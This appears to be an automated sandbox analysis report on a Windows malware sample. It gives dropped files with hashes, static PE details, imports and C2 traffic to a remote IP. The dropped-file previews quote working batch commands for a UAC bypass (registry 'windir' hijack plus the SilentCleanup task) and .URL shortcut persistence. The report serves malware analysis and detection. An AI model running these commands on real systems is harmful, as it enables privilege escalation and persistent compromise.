Yara Hits:	Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\fvghbqsD.url, Author: @itsreallynick (Nick Carr)
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Dsqbhgvf.exe"..IconIndex=1..

C:\Users\Public\Trast.bat Download File
Process:	C:\Users\user\Desktop\IQl00lxPjo.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	34
Entropy (8bit):	4.314972767530033
Encrypted:	false
SSDEEP:	3:LjTnaHF5wlM:rnaHSM
MD5:	4068C9F69FCD8A171C67F81D4A952A54
SHA1:	4D2536A8C28CDCC17465E20D6693FB9E8E713B36
SHA-256:	24222300C78180B50ED1F8361BA63CB27316EC994C1C9079708A51B4A1A9D810
SHA-512:	A64F9319ACC51FFFD0491C74DCD9C9084C2783B82F95727E4BFE387A8528C6DCF68F11418E88F1E133D115DAF907549C86DD7AD866B2A7938ADD5225FBB2811D
Malicious:	false
Preview:	start /min C:\Users\Public\UKO.bat

C:\Users\Public\UKO.bat Download File
Process:	C:\Users\user\Desktop\IQl00lxPjo.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	250
Entropy (8bit):	4.865356627324657
Encrypted:	false
SSDEEP:	6:rgnMXd1CQnMXd1COm8hnaHNHIXUnMXd1CoD9c1uOw1H1gOvOBAn:rgamIHIXUaXe1uOeVqy
MD5:	EAF8D967454C3BBDDBF2E05A421411F8
SHA1:	6170880409B24DE75C2DC3D56A506FBFF7F6622C
SHA-256:	F35F2658455A2E40F151549A7D6465A836C33FA9109E67623916F889849EAC56
SHA-512:	FE5BE5C673E99F70C93019D01ABB0A29DD2ECF25B2D895190FF551F020C28E7D8F99F65007F440F0F76C5BCAC343B2A179A94D190C938EA3B9E1197890A412E9
Malicious:	false
Preview:	reg delete hkcu\Environment /v windir /f..reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "..schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I & exit..

C:\Users\Public\nest Download File
Process:	C:\Users\user\Desktop\IQl00lxPjo.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	10
Entropy (8bit):	3.321928094887362
Encrypted:	false
SSDEEP:	3:xHQ6:Bp
MD5:	373B184E2170B4EC46625ACD5BBF9F8B
SHA1:	FF4139853B895C0BC626BEBF705FCBAED493A28B
SHA-256:	A753F2006FE838116E8969E075E53EF64387CDC71D1215758E9E3D47D44C3B98
SHA-512:	0A6C27112762CB22239B25C4179517137999EC178801FBF0A3EFDEE91291C3C931B8805FF77E2497028AA77FDA6A28CDCD13A94B73E7FE663CA056CFF7BB1C23
Malicious:	false
Preview:	Dsqbhgvf..

C:\Users\Public\nest.bat Download File
Process:	C:\Users\user\Desktop\IQl00lxPjo.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	53
Entropy (8bit):	4.263285494083192
Encrypted:	false
SSDEEP:	3:LjT9fnMXdemzCK0vn:rZnMXd1CV
MD5:	8ADA51400B7915DE2124BAAF75E3414C
SHA1:	1A7B9DB12184AB7FD7FCE1C383F9670A00ADB081
SHA-256:	45AA3957C29865260A78F03EEF18AE9AEBDBF7BEA751ECC88BE4A799F2BB46C7
SHA-512:	9AFC138157A4565294CA49942579CDB6F5D8084E56F9354738DE62B585F4C0FA3E7F2CBC9541827F2084E3FF36C46EED29B46F5DD2444062FFCD05C599992E68
Malicious:	false
Preview:	start /min reg delete hkcu\Environment /v windir /f..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\Dsqbhgvfcbfuajfyoyryjvltgfkcgym[1] Download File
Process:	C:\Users\user\Desktop\IQl00lxPjo.exe
File Type:	data
Category:	dropped
Size (bytes):	582144
Entropy (8bit):	7.999235995821566
Encrypted:	true
SSDEEP:	12288:7goBElyCyWBKaxDKfQ8K9bMZCJfTFpUlYFEDVbrpjmgJrv6aJV2:UEExGK94ZMfRpEYup38gJryaJc
MD5:	E9116C413E8F55849FC05ABED62DB4D6
SHA1:	5CB1468C95350FF8B74D5B8ABB8ABCB5F1CEA074
SHA-256:	ACD077CED83E35E49512C807F3AF36FF1B39EF7D62A19CAFD975313A0D1F6D41
SHA-512:	477B1BDD7F35ABA99894B59F8C5525A38677DF10011BDBCE1736B9E4FDDB12D3306B5149E1AF7119E9FA485E78B921F5E0955BBC9C0049DA556B9BB52BA85ECF
Malicious:	false
Preview:	.#i.XPL.+i.a.t.....".y......5....I7........K9.F.p....r..3.....\|5.!m....k.e.9.C-n....J.........x.Y._..(.9.ZY...!jv..u.".?.<.c.~'x...i.a.t.....".y......5....I7........K9.F.p....r..3.....\|5.!m....k.e.9.C-n....J.........x.Y._..(.9.ZY..."......=../.....=..<.....t..._.....=[..a..3.hn..Q.3...........^hs............y..J..q.T\h\|:...B.7S...N..w.....Y.S...@.{..2.NB.......0.I)frc.8...C$.."....,.?%`c..1B...Q..g...=.....-a.D.~i.nP.{...'..#z>..5....]...............k.W.O.ZJ..ZXW.\|&..H..o.RI>.z(.Y.;_.....TU.0...9..`k..m.I?;...b....\|f2.A^..`l..^he._.g......<..7.......=_....2...........6.bhe.......c.]...?7....r....J..6.bhe..........".Q.+fs..q.H..'}.._.z ...c....m.KK<...9..`k..m.I?;...b.....\%....1..v...]....W..G2.M..k.o............W.C ..>.}....p\%...o.g.<..TQ............m.h>._.tbjr.]...;..ZB..U.@.p.>.H...?`.k.l.=..Y.S...@.{..2.NB.......Ah......(...Y.S...@.{..2.NB.....}.F...I)g.$..5...0.~F..U..}.C..{..=.....".0......[......0.m.....(....G-i.!K-l..!v

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\Dsqbhgvfcbfuajfyoyryjvltgfkcgym[2] Download File
Process:	C:\Users\Public\Libraries\Dsqbhgvf.exe
File Type:	data
Category:	dropped
Size (bytes):	582144
Entropy (8bit):	7.999235995821566
Encrypted:	true
SSDEEP:	12288:7goBElyCyWBKaxDKfQ8K9bMZCJfTFpUlYFEDVbrpjmgJrv6aJV2:UEExGK94ZMfRpEYup38gJryaJc
MD5:	E9116C413E8F55849FC05ABED62DB4D6
SHA1:	5CB1468C95350FF8B74D5B8ABB8ABCB5F1CEA074
SHA-256:	ACD077CED83E35E49512C807F3AF36FF1B39EF7D62A19CAFD975313A0D1F6D41
SHA-512:	477B1BDD7F35ABA99894B59F8C5525A38677DF10011BDBCE1736B9E4FDDB12D3306B5149E1AF7119E9FA485E78B921F5E0955BBC9C0049DA556B9BB52BA85ECF
Malicious:	false
Preview:	.#i.XPL.+i.a.t.....".y......5....I7........K9.F.p....r..3.....\|5.!m....k.e.9.C-n....J.........x.Y._..(.9.ZY...!jv..u.".?.<.c.~'x...i.a.t.....".y......5....I7........K9.F.p....r..3.....\|5.!m....k.e.9.C-n....J.........x.Y._..(.9.ZY..."......=../.....=..<.....t..._.....=[..a..3.hn..Q.3...........^hs............y..J..q.T\h\|:...B.7S...N..w.....Y.S...@.{..2.NB.......0.I)frc.8...C$.."....,.?%`c..1B...Q..g...=.....-a.D.~i.nP.{...'..#z>..5....]...............k.W.O.ZJ..ZXW.\|&..H..o.RI>.z(.Y.;_.....TU.0...9..`k..m.I?;...b....\|f2.A^..`l..^he._.g......<..7.......=_....2...........6.bhe.......c.]...?7....r....J..6.bhe..........".Q.+fs..q.H..'}.._.z ...c....m.KK<...9..`k..m.I?;...b.....\%....1..v...]....W..G2.M..k.o............W.C ..>.}....p\%...o.g.<..TQ............m.h>._.tbjr.]...;..ZB..U.@.p.>.H...?`.k.l.=..Y.S...@.{..2.NB.......Ah......(...Y.S...@.{..2.NB.....}.F...I)g.$..5...0.~F..U..}.C..{..=.....".0......[......0.m.....(....G-i.!K-l..!v

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\Dsqbhgvfcbfuajfyoyryjvltgfkcgym[1] Download File
Process:	C:\Users\Public\Libraries\Dsqbhgvf.exe
File Type:	data
Category:	dropped
Size (bytes):	582144
Entropy (8bit):	7.999235995821566
Encrypted:	true
SSDEEP:	12288:7goBElyCyWBKaxDKfQ8K9bMZCJfTFpUlYFEDVbrpjmgJrv6aJV2:UEExGK94ZMfRpEYup38gJryaJc
MD5:	E9116C413E8F55849FC05ABED62DB4D6
SHA1:	5CB1468C95350FF8B74D5B8ABB8ABCB5F1CEA074
SHA-256:	ACD077CED83E35E49512C807F3AF36FF1B39EF7D62A19CAFD975313A0D1F6D41
SHA-512:	477B1BDD7F35ABA99894B59F8C5525A38677DF10011BDBCE1736B9E4FDDB12D3306B5149E1AF7119E9FA485E78B921F5E0955BBC9C0049DA556B9BB52BA85ECF
Malicious:	false
Preview:	.#i.XPL.+i.a.t.....".y......5....I7........K9.F.p....r..3.....\|5.!m....k.e.9.C-n....J.........x.Y._..(.9.ZY...!jv..u.".?.<.c.~'x...i.a.t.....".y......5....I7........K9.F.p....r..3.....\|5.!m....k.e.9.C-n....J.........x.Y._..(.9.ZY..."......=../.....=..<.....t..._.....=[..a..3.hn..Q.3...........^hs............y..J..q.T\h\|:...B.7S...N..w.....Y.S...@.{..2.NB.......0.I)frc.8...C$.."....,.?%`c..1B...Q..g...=.....-a.D.~i.nP.{...'..#z>..5....]...............k.W.O.ZJ..ZXW.\|&..H..o.RI>.z(.Y.;_.....TU.0...9..`k..m.I?;...b....\|f2.A^..`l..^he._.g......<..7.......=_....2...........6.bhe.......c.]...?7....r....J..6.bhe..........".Q.+fs..q.H..'}.._.z ...c....m.KK<...9..`k..m.I?;...b.....\%....1..v...]....W..G2.M..k.o............W.C ..>.}....p\%...o.g.<..TQ............m.h>._.tbjr.]...;..ZB..U.@.p.>.H...?`.k.l.=..Y.S...@.{..2.NB.......Ah......(...Y.S...@.{..2.NB.....}.F...I)g.$..5...0.~F..U..}.C..{..=.....".0......[......0.m.....(....G-i.!K-l..!v

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.67407039380249
TrID:	Win32 Executable (generic) a (10002005/4) 90.53% Win32 Executable Borland Delphi 7 (665061/41) 6.02% Win32 Executable Borland Delphi 6 (262906/60) 2.38% InstallShield setup (43055/19) 0.39% Win32 EXE PECompact compressed (generic) (41571/9) 0.38%
File name:	IQl00lxPjo.exe
File size:	811520
MD5:	9b8ae8edfe553edea6108dceebcc57b8
SHA1:	eae4825368e0ed56db5484012303add569cb98e9
SHA256:	d79ba47a55b5dcb4cf6e76ac13bd3179e1523d5904483232d9ce9d39915dbc69
SHA512:	5f357814e91904f33b878691f143b34139fd445e1651dae8a9825ca4b43710ddf8d2ec32d9f9893d6e93b93259b2ac19d0587fe4aa1b5a4987c064e793b12658
SSDEEP:	24576:W0WE0AyOVWoKcwdZHGIZHrIzvlZwXI7Dyj3SaH+MJu:W0WEoQhudZS
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	88c7ce18995c2711

Static PE Info

General
Entrypoint:	0x461128
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	91f41270d021c09d2e59583bf5cdff98

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 00460EE0h
call 00007FCD18D8F011h
nop
nop
mov eax, dword ptr [0046320Ch]
mov eax, dword ptr [eax]
call 00007FCD18DDF7ABh
mov eax, dword ptr [0046320Ch]
mov eax, dword ptr [eax]
mov edx, 00461188h
call 00007FCD18DDF39Ah
mov ecx, dword ptr [00463078h]
mov eax, dword ptr [0046320Ch]
mov eax, dword ptr [eax]
mov edx, dword ptr [00460BB0h]
call 00007FCD18DDF79Ah
mov eax, dword ptr [0046320Ch]
mov eax, dword ptr [eax]
call 00007FCD18DDF80Eh
call 00007FCD18D8CC59h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x65000	0x242c	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x71000	0x5b000	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6a000	0x6e38	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x69000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x60194	0x60200	False	0.529060671326	data	6.54290366694	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
DATA	0x62000	0x139c	0x1400	False	0.4396484375	data	4.14683566997	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
BSS	0x64000	0xed5	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata	0x65000	0x242c	0x2600	False	0.350945723684	data	4.76283306715	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.tls	0x68000	0x10	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata	0x69000	0x18	0x200	False	0.048828125	data	0.20058190744	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0x6a000	0x6e38	0x7000	False	0.610456194196	data	6.65210314529	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0x71000	0x5b000	0x5b000	False	0.276992294815	data	5.76295915505	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
DONGA	0x71bf0	0x4cae4	PC bitmap, Windows 3.x format, 319 x 158 x 4	English	United States
RT_CURSOR	0xbe6d4	0x134	data
RT_CURSOR	0xbe808	0x134	data
RT_CURSOR	0xbe93c	0x134	data
RT_CURSOR	0xbea70	0x134	data
RT_CURSOR	0xbeba4	0x134	data
RT_CURSOR	0xbecd8	0x134	data
RT_CURSOR	0xbee0c	0x134	data
RT_BITMAP	0xbef40	0x1d0	data
RT_BITMAP	0xbf110	0x1e4	data
RT_BITMAP	0xbf2f4	0x1d0	data
RT_BITMAP	0xbf4c4	0x1d0	data
RT_BITMAP	0xbf694	0x1d0	data
RT_BITMAP	0xbf864	0x1d0	data
RT_BITMAP	0xbfa34	0x1d0	data
RT_BITMAP	0xbfc04	0x1d0	data
RT_BITMAP	0xbfdd4	0x1d0	data
RT_BITMAP	0xbffa4	0x1d0	data
RT_BITMAP	0xc0174	0xe8	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0xc025c	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0xc06c4	0x988	data	English	United States
RT_ICON	0xc104c	0x10a8	data	English	United States
RT_ICON	0xc20f4	0x25a8	data	English	United States
RT_ICON	0xc469c	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 0, next used block 0	English	United States
RT_DIALOG	0xc88c4	0x52	data
RT_STRING	0xc8918	0x2ec	data
RT_STRING	0xc8c04	0x1f0	data
RT_STRING	0xc8df4	0x1c0	data
RT_STRING	0xc8fb4	0xdc	data
RT_STRING	0xc9090	0x354	data
RT_STRING	0xc93e4	0xd4	data
RT_STRING	0xc94b8	0x110	data
RT_STRING	0xc95c8	0x24c	data
RT_STRING	0xc9814	0x3f0	data
RT_STRING	0xc9c04	0x378	data
RT_STRING	0xc9f7c	0x3e8	data
RT_STRING	0xca364	0x234	data
RT_STRING	0xca598	0xec	data
RT_STRING	0xca684	0x1b4	data
RT_STRING	0xca838	0x3e4	data
RT_STRING	0xcac1c	0x358	data
RT_STRING	0xcaf74	0x2b4	data
RT_RCDATA	0xcb228	0x10	data
RT_RCDATA	0xcb238	0x2f8	data
RT_RCDATA	0xcb530	0x7fb	Delphi compiled form 'T__613549893'
RT_GROUP_CURSOR	0xcbd2c	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0xcbd40	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0xcbd54	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0xcbd68	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0xcbd7c	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0xcbd90	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0xcbda4	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_ICON	0xcbdb8	0x4c	data	English	United States

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
user32.dll	GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll	lstrcpyA, lstrcmpiA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetMapMode, GetGraphicsMode, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetDCPenColor, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBkColor, GetBitmapBits, ExtTextOutA, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CloseEnhMetaFile, BitBlt
user32.dll	CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
ole32.dll	CreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
oleaut32.dll	GetErrorInfo, SysFreeString
comctl32.dll	ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
comdlg32.dll	GetOpenFileNameA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 16, 2021 07:31:43.595730066 CEST	49768	8618	192.168.2.4	31.3.152.100
Sep 16, 2021 07:31:43.736527920 CEST	8618	49768	31.3.152.100	192.168.2.4
Sep 16, 2021 07:31:43.739193916 CEST	49768	8618	192.168.2.4	31.3.152.100
Sep 16, 2021 07:31:43.768744946 CEST	49768	8618	192.168.2.4	31.3.152.100
Sep 16, 2021 07:31:43.919629097 CEST	8618	49768	31.3.152.100	192.168.2.4
Sep 16, 2021 07:31:43.961529970 CEST	49768	8618	192.168.2.4	31.3.152.100
Sep 16, 2021 07:31:44.102533102 CEST	8618	49768	31.3.152.100	192.168.2.4
Sep 16, 2021 07:31:44.110025883 CEST	49768	8618	192.168.2.4	31.3.152.100
Sep 16, 2021 07:31:44.295824051 CEST	8618	49768	31.3.152.100	192.168.2.4
Sep 16, 2021 07:31:44.297333956 CEST	49768	8618	192.168.2.4	31.3.152.100
Sep 16, 2021 07:31:44.481712103 CEST	8618	49768	31.3.152.100	192.168.2.4
Sep 16, 2021 07:31:44.630225897 CEST	8618	49768	31.3.152.100	192.168.2.4
Sep 16, 2021 07:31:44.637145042 CEST	49768	8618	192.168.2.4	31.3.152.100
Sep 16, 2021 07:31:44.830382109 CEST	8618	49768	31.3.152.100	192.168.2.4
Sep 16, 2021 07:31:54.642986059 CEST	8618	49768	31.3.152.100	192.168.2.4
Sep 16, 2021 07:31:54.678993940 CEST	49768	8618	192.168.2.4	31.3.152.100
Sep 16, 2021 07:31:54.863089085 CEST	8618	49768	31.3.152.100	192.168.2.4
Sep 16, 2021 07:32:04.660557985 CEST	8618	49768	31.3.152.100	192.168.2.4
Sep 16, 2021 07:32:04.664980888 CEST	49768	8618	192.168.2.4	31.3.152.100
Sep 16, 2021 07:32:04.846687078 CEST	8618	49768	31.3.152.100	192.168.2.4
Sep 16, 2021 07:32:14.663853884 CEST	8618	49768	31.3.152.100	192.168.2.4
Sep 16, 2021 07:32:14.667356014 CEST	49768	8618	192.168.2.4	31.3.152.100
Sep 16, 2021 07:32:14.851214886 CEST	8618	49768	31.3.152.100	192.168.2.4
Sep 16, 2021 07:32:24.671042919 CEST	8618	49768	31.3.152.100	192.168.2.4
Sep 16, 2021 07:32:24.677238941 CEST	49768	8618	192.168.2.4	31.3.152.100
Sep 16, 2021 07:32:24.870946884 CEST	8618	49768	31.3.152.100	192.168.2.4
Sep 16, 2021 07:32:34.672107935 CEST	8618	49768	31.3.152.100	192.168.2.4
Sep 16, 2021 07:32:34.677838087 CEST	49768	8618	192.168.2.4	31.3.152.100
Sep 16, 2021 07:32:34.873157978 CEST	8618	49768	31.3.152.100	192.168.2.4
Sep 16, 2021 07:32:44.676422119 CEST	8618	49768	31.3.152.100	192.168.2.4
Sep 16, 2021 07:32:44.678942919 CEST	49768	8618	192.168.2.4	31.3.152.100
Sep 16, 2021 07:32:44.866179943 CEST	8618	49768	31.3.152.100	192.168.2.4
Sep 16, 2021 07:32:54.689173937 CEST	8618	49768	31.3.152.100	192.168.2.4
Sep 16, 2021 07:32:54.703861952 CEST	49768	8618	192.168.2.4	31.3.152.100
Sep 16, 2021 07:32:54.889919996 CEST	8618	49768	31.3.152.100	192.168.2.4
Sep 16, 2021 07:33:04.691196918 CEST	8618	49768	31.3.152.100	192.168.2.4
Sep 16, 2021 07:33:04.694382906 CEST	49768	8618	192.168.2.4	31.3.152.100
Sep 16, 2021 07:33:04.878144026 CEST	8618	49768	31.3.152.100	192.168.2.4
Sep 16, 2021 07:33:14.749455929 CEST	8618	49768	31.3.152.100	192.168.2.4
Sep 16, 2021 07:33:14.751158953 CEST	49768	8618	192.168.2.4	31.3.152.100
Sep 16, 2021 07:33:14.933299065 CEST	8618	49768	31.3.152.100	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 16, 2021 07:31:02.042660952 CEST	53097	53	192.168.2.4	8.8.8.8
